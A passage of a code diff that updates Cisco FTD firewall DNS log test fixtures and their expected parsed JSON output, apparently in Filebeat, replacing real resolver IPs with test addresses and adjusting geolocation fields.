-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 1.128.3.4, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 1.128.3.4, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 1.128.3.4, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299
diff --git a/x-pack/filebeat/module/cisco/ftd/test/dns.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/dns.log-expected.json
index 900923811c3f..8353ab7bb650 100644
--- a/x-pack/filebeat/module/cisco/ftd/test/dns.log-expected.json
+++ b/x-pack/filebeat/module/cisco/ftd/test/dns.log-expected.json
@@ -16,7 +16,7 @@
         "cisco.ftd.security.dns_query": "elastic.co",
         "cisco.ftd.security.dns_record_type": "a host address",
         "cisco.ftd.security.dns_ttl": "70",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -33,16 +33,17 @@
         "cisco.ftd.security.src_port": "57379",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 145,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "elastic.co",
@@ -58,7 +59,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -74,7 +75,7 @@
         "log.level": "alert",
         "log.offset": 0,
         "network.application": "dns client",
-        "network.community_id": "1:yuD3M7UhwRSNitDpAnWcqzEC85c=",
+        "network.community_id": "1:Uwfc1VhX0rr+lXXQ8Kiy2934ls0=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -91,7 +92,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -127,7 +128,7 @@
         "cisco.ftd.security.dns_query": "elastic.co",
         "cisco.ftd.security.dns_record_type": "IP6 Address",
         "cisco.ftd.security.dns_ttl": "299",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -145,16 +146,17 @@
         "cisco.ftd.security.src_port": "51389",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 193,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "elastic.co",
@@ -170,7 +172,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -184,9 +186,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 658,
+        "log.offset": 663,
         "network.application": "dns client",
-        "network.community_id": "1:eDcIGG/W1UcwGWzaTgv5mgr2RDw=",
+        "network.community_id": "1:f3leSDycNDPiw2Pu2XLO+oMF4W8=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -203,7 +205,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -238,7 +240,7 @@
         "cisco.ftd.security.dns_query": "elastic.co",
         "cisco.ftd.security.dns_record_type": "the canonical name for an alias",
         "cisco.ftd.security.dns_ttl": "899",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -255,16 +257,17 @@
         "cisco.ftd.security.src_port": "53033",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 166,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "elastic.co",
@@ -280,7 +283,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -294,9 +297,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 1371,
+        "log.offset": 1381,
         "network.application": "dns client",
-        "network.community_id": "1:nTPeg7DUgB3rjeFwl+cm5VHEdXQ=",
+        "network.community_id": "1:f+1BLN4exLJYoDCfuD6+el4NNZc=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -313,7 +316,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -349,7 +352,7 @@
         "cisco.ftd.security.dns_query": "www.elastic.co",
         "cisco.ftd.security.dns_record_type": "a host address",
         "cisco.ftd.security.dns_ttl": "12",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -367,16 +370,17 @@
         "cisco.ftd.security.src_port": "55371",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 200,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "www.elastic.co",
@@ -392,7 +396,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -406,9 +410,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 2047,
+        "log.offset": 2062,
         "network.application": "dns client",
-        "network.community_id": "1:F3IHQYMd3DO1p+rWBITDU1/XCgA=",
+        "network.community_id": "1:BRZXgAyg0sEtB4BCGaSfBuIpTmY=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -425,7 +429,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -461,7 +465,7 @@
         "cisco.ftd.security.dns_record_type": "IP6 Address",
         "cisco.ftd.security.dns_response_type": "No error",
         "cisco.ftd.security.dns_ttl": "299",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -478,16 +482,17 @@
         "cisco.ftd.security.src_port": "60441",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 193,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "elastic.co",
@@ -503,7 +508,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
